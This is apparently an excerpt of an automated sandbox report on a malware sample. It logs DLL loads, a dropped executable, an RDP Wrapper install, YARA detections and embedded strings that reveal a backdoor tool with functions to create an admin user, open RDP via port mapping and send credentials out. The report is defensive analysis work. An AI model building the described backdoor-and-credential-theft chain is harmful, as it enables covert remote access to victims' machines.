Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\ProgramData\BKJKEBGDHD.exe	Section loaded: mscoree.dll
Source: C:\ProgramData\BKJKEBGDHD.exe	Section loaded: apphelp.dll
Source: C:\ProgramData\BKJKEBGDHD.exe	Section loaded: kernel.appcore.dll
Source: C:\ProgramData\BKJKEBGDHD.exe	Section loaded: version.dll
Source: C:\ProgramData\BKJKEBGDHD.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\ProgramData\BKJKEBGDHD.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\ProgramData\BKJKEBGDHD.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\ProgramData\BKJKEBGDHD.exe	Section loaded: cryptsp.dll
Source: C:\ProgramData\BKJKEBGDHD.exe	Section loaded: rsaenh.dll
Source: C:\ProgramData\BKJKEBGDHD.exe	Section loaded: cryptbase.dll
Source: C:\ProgramData\BKJKEBGDHD.exe	Section loaded: wldp.dll
Source: C:\ProgramData\BKJKEBGDHD.exe	Section loaded: amsi.dll
Source: C:\ProgramData\BKJKEBGDHD.exe	Section loaded: userenv.dll
Source: C:\ProgramData\BKJKEBGDHD.exe	Section loaded: profapi.dll
Source: C:\ProgramData\BKJKEBGDHD.exe	Section loaded: msasn1.dll
Source: C:\ProgramData\BKJKEBGDHD.exe	Section loaded: gpapi.dll
Source: C:\ProgramData\BKJKEBGDHD.exe	Section loaded: windows.storage.dll
Source: C:\ProgramData\BKJKEBGDHD.exe	Section loaded: rasapi32.dll
Source: C:\ProgramData\BKJKEBGDHD.exe	Section loaded: rasman.dll
Source: C:\ProgramData\BKJKEBGDHD.exe	Section loaded: rtutils.dll
Source: C:\ProgramData\BKJKEBGDHD.exe	Section loaded: mswsock.dll
Source: C:\ProgramData\BKJKEBGDHD.exe	Section loaded: winhttp.dll
Source: C:\ProgramData\BKJKEBGDHD.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\ProgramData\BKJKEBGDHD.exe	Section loaded: iphlpapi.dll
Source: C:\ProgramData\BKJKEBGDHD.exe	Section loaded: dhcpcsvc6.dll
Source: C:\ProgramData\BKJKEBGDHD.exe	Section loaded: dhcpcsvc.dll
Source: C:\ProgramData\BKJKEBGDHD.exe	Section loaded: dnsapi.dll
Source: C:\ProgramData\BKJKEBGDHD.exe	Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: dsrole.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: logoncli.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: cscapi.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: samlib.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe	Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\timeout.exe	Section loaded: version.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: ifmon.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mprapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rasmontr.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rasapi32.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rasman.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mfc42u.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rasman.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: authfwcfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: fwpolicyiomgr.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: firewallapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: fwbase.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dhcpcmonitor.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dot3cfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dot3api.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: onex.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: eappcfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: eappprxy.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: fwcfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: hnetmon.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: netshell.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nlaapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: netsetupapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: netiohlp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nettrace.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nshhttp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: httpapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nshipsec.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: activeds.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: polstore.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: winipsec.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: adsldpc.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nshwfp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: cabinet.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: p2pnetsh.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: p2p.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rpcnsh.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wcnnetsh.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wlanapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: whhelper.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wlancfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wshelper.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wevtapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wwancfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wwapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wcmapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rmclient.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mobilenetworking.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: peerdistsh.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: slc.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: sppc.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: ktmw32.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mprmsg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: dsrole.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: logoncli.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: samlib.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: dsrole.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: logoncli.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: samlib.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: dsrole.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: logoncli.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: cscapi.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: samlib.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ifmon.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mprapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasmontr.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasapi32.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasman.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mfc42u.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasman.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: authfwcfg.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwpolicyiomgr.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: firewallapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwbase.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dhcpcmonitor.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dot3cfg.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dot3api.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: onex.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: eappcfg.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: eappprxy.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwcfg.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: hnetmon.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: netshell.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nlaapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: netsetupapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: netiohlp.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nshhttp.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: httpapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nshipsec.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: activeds.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: polstore.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: winipsec.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: adsldpc.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nshwfp.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: cabinet.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: p2pnetsh.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: p2p.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rpcnsh.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: whhelper.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wlancfg.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wlanapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wshelper.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wevtapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: peerdistsh.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wcmapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rmclient.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mobilenetworking.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: slc.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ktmw32.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mprmsg.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: dsrole.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: logoncli.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: samlib.dll

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe

File written: C:\Program Files\RDP Wrapper\rdpwrap.ini

Source: C:\ProgramData\BKJKEBGDHD.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe	Directory created: C:\Program Files\RDP Wrapper
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe	Directory created: C:\Program Files\RDP Wrapper\rdpwrap.ini
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe	Directory created: C:\Program Files\RDP Wrapper\rdpwrap.dll

Source: file.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: file.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: file.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: mozglue.pdbP source: RegAsm.exe, 00000003.00000002.2909837228.0000000026A3C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmp
Source:	Binary string: freebl3.pdb source: RegAsm.exe, 00000003.00000002.2898107037.0000000020AC7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: freebl3.pdbp source: RegAsm.exe, 00000003.00000002.2898107037.0000000020AC7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: nss3.pdb@ source: RegAsm.exe, 00000003.00000002.2951825363.000000003E7FD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2987077823.000000006C74F000.00000002.00000001.01000000.00000008.sdmp, nss3.dll.3.dr
Source:	Binary string: c:\rje\tg\vlt\obj\Release\ojc.pdb source: 66f5dbaca34ac_lfdnsafnds[1].exe.3.dr, BGDGHJEHJJ.exe.3.dr
Source:	Binary string: <>c__DisplayClass0_0<GenerateRandomPassword>b__0<>u__1IEnumerable`1Task`1TaskAwaiter`10xb11a1<>u__2Func`2Dictionary`2<Main>d__5get_UTF8<Module><Main>Q2xpZW50QUFBUkRQSW5zdGFsbGVyQUFBUHJvZ3JhbUFBQXNzZW1ibHlMb2FkZXJBUkRQQ3JlYXRvcl9Qcm9jZXNzZWRCeUZvZHlBSystem.IOGetPublicIP_Costuracostura.metadatamscorlibSystem.Collections.GenericDiscoverDeviceAsyncDownloadFileTaskAsyncCreatePortMapAsyncReadLoadAddisAttachedInterlockedcostura.costura.pdb.compressedcostura.costura.dll.compressedcostura.system.diagnostics.diagnosticsource.dll.compressedcostura.open.nat.dll.compressedget_ConnectedAwaitUnsafeOnCompletedget_IsCompletedSystem.Collections.SpecializedNewGuidReadToEndExecuteCommandcommandGenerateRandomPasswordpasswordNatDeviceCancellationTokenSourcesourceset_ModePaddingModeCompressionModeCipherModeRangeExchangenullCacheEnumerableIDisposableget_AsyncWaitHandleDownloadFileget_NamefullNameGetAdminGroupNameGetNamerequestedAssemblyNameusernameWaitOneCombineIAsyncStateMachineSetStateMachinestateMachineValueTypeSystem.CorecultureDisposeCreate<>1__stateWriteCompilerGeneratedAttributeDebuggableAttributeAsyncStateMachineAttributeTargetFrameworkAttributeDebuggerHiddenAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeset_UseShellExecuteByteTryGetValueadd_AssemblyResolveRDPCreator.exeSystem.Threadingset_PaddingEncodingSystem.Runtime.VersioningMappingFromBase64StringDownloadStringCultureToStringGetStringSubstringAttachComputeHashzipPathGetTempPathpathget_LengthlengthEndsWithUriAsyncCallbacknullCacheLockTransformFinalBlockget_TaskProtocolzipUrlserverUrlurlReadStreamLoadStreamGetManifestResourceStreamDeflateStreamMemoryStreamstreamset_ItemSystemSymmetricAlgorithmHashAlgorithmRandomrandomICryptoTransformTimeSpanIsPortOpenRDPCreator.cMainAppDomainget_CurrentDomainFodyVersionSystem.IO.CompressiondestinationSystem.GlobalizationSystem.ReflectionNameValueCollectionset_PositionSetExceptionStringComparisonusernamePatternpatternCopyToget_CultureInfoProcessStartInfoAddUserToAdminGroupSystem.LinqClearStreamReaderTextReaderMD5CryptoServiceProviderTripleDESCryptoServiceProviderAsyncTaskMethodBuilder<>t__buildersenderResolveEventHandlerPortMapperInstallRDPWrapperNatDiscovererCheckForRDPUserCreateAdminUserTaskAwaiterGetAwaiterEnterRDPCreator.ctor.cctorMonitorCreateDecryptorSystem.DiagnosticsFromMillisecondsSystem.Runtime.CompilerServicesReadFromEmbeddedResourcesDebuggingModesGetAssembliesresourceNamessymbolNamesassemblyNamesGetBytesUploadValuesget_FlagsAssemblyNameFlagsResolveEventArgsargsSystem.Threading.TasksSendCredentialsEqualsContainsget_CharsProcessSystem.Net.SocketsExistsOpen.NatConcatObjectSelectBeginConnectSystem.NetWaitForExitIAsyncResultGetResultSetResultToLowerInvariantWebClientTcpClientEnvironmentStartConvertRDPPortportget_StandardOutputset_RedirectStandardOutputExecuteCommandWithOutputMoveNextSystem.Textset_CreateNoWindowToArrayset_KeyContainsKeySystem.Security.CryptographyResolveAssemblyReadExistingAssemblyGetExecutingAssemblyIsNullOrEmptygVexuh5UIe2gYxGhNy
Source:	Binary string: rdpclip.pdbH source: RDPWInst.exe, 00000016.00000002.2858987262.0000000000450000.00000002.00000001.01000000.0000000F.sdmp
Source:	Binary string: costura.costura.pdb.compressedlB source: BKJKEBGDHD.exe, 0000000F.00000002.3052610087.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: c:\rje\tg\vea6\obj\Release\ojc.pdb source: file.exe
Source:	Binary string: costura.costura.pdb.compressed source: BKJKEBGDHD.exe, 0000000F.00000000.2789350400.0000000000AD2000.00000002.00000001.01000000.0000000C.sdmp, 66f5de72d9ebd_rdp[1].exe.3.dr
Source:	Binary string: rdpclip.pdbJ source: RDPWInst.exe, 00000016.00000002.2858987262.0000000000450000.00000002.00000001.01000000.0000000F.sdmp
Source:	Binary string: softokn3.pdb@ source: RegAsm.exe, 00000003.00000002.2934684215.0000000032912000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr
Source:	Binary string: RfxVmt.pdb source: BKJKEBGDHD.exe, 0000000F.00000002.3052610087.0000000002FAA000.00000004.00000800.00020000.00000000.sdmp, RDPWInst.exe, 00000016.00000002.2858987262.0000000000450000.00000002.00000001.01000000.0000000F.sdmp
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: RegAsm.exe, 00000003.00000002.2943594444.0000000038886000.00000004.00000020.00020000.00000000.sdmp, vcruntime140.dll.3.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: RegAsm.exe, 00000003.00000002.2920076406.000000002C9A6000.00000004.00000020.00020000.00000000.sdmp, msvcp140.dll.3.dr
Source:	Binary string: nss3.pdb source: RegAsm.exe, 00000003.00000002.2951825363.000000003E7FD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2987077823.000000006C74F000.00000002.00000001.01000000.00000008.sdmp, nss3.dll.3.dr
Source:	Binary string: rdpclip.pdb source: RDPWInst.exe, 00000016.00000002.2858987262.0000000000450000.00000002.00000001.01000000.0000000F.sdmp
Source:	Binary string: mozglue.pdb source: RegAsm.exe, 00000003.00000002.2909837228.0000000026A3C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmp
Source:	Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: RegAsm.exe, 00000003.00000002.2893376211.0000000020568000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2858662976.000000001A5FC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3305375474.000000002050B000.00000002.00001000.00020000.00000000.sdmp
Source:	Binary string: RfxVmt.pdbGCTL source: BKJKEBGDHD.exe, 0000000F.00000002.3052610087.0000000002FAA000.00000004.00000800.00020000.00000000.sdmp, RDPWInst.exe, 00000016.00000002.2858987262.0000000000450000.00000002.00000001.01000000.0000000F.sdmp
Source:	Binary string: c:\rje\tg\ps7uj1z\obj\Release\ojc.pdb source: GIJEGDAKEH.exe.3.dr, 66f5db9e54794_vfkagks[1].exe.3.dr
Source:	Binary string: softokn3.pdb source: RegAsm.exe, 00000003.00000002.2934684215.0000000032912000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr
Source:	Binary string: costura.costura.pdb.compressed\|\|\|Costura.pdb\|6C6000A5EAF8579850AB82A89BD6268776EB51AD\|2608 source: BKJKEBGDHD.exe, 0000000F.00000000.2789350400.0000000000AD2000.00000002.00000001.01000000.0000000C.sdmp, 66f5de72d9ebd_rdp[1].exe.3.dr

Data Obfuscation

.NET source code contains potential unpacker

Source: BKJKEBGDHD.exe.3.dr, QXNzZW1ibHlMb2FkZXJB.cs	.Net Code: ReadFromEmbeddedResources System.Reflection.Assembly.Load(byte[])
Source: 66f5de72d9ebd_rdp[1].exe.3.dr, QXNzZW1ibHlMb2FkZXJB.cs	.Net Code: ReadFromEmbeddedResources System.Reflection.Assembly.Load(byte[])

Yara detected Costura Assembly Loader

Source: Yara match	File source: 15.0.BKJKEBGDHD.exe.ad0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000F.00000000.2789350400.0000000000AD2000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.3052610087.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: BKJKEBGDHD.exe PID: 6240, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\BKJKEBGDHD.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\66f5de72d9ebd_rdp[1].exe, type: DROPPED

Source: BKJKEBGDHD.exe.3.dr

Static PE information: 0xA040A332 [Sat Mar 13 22:44:02 2055 UTC]

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

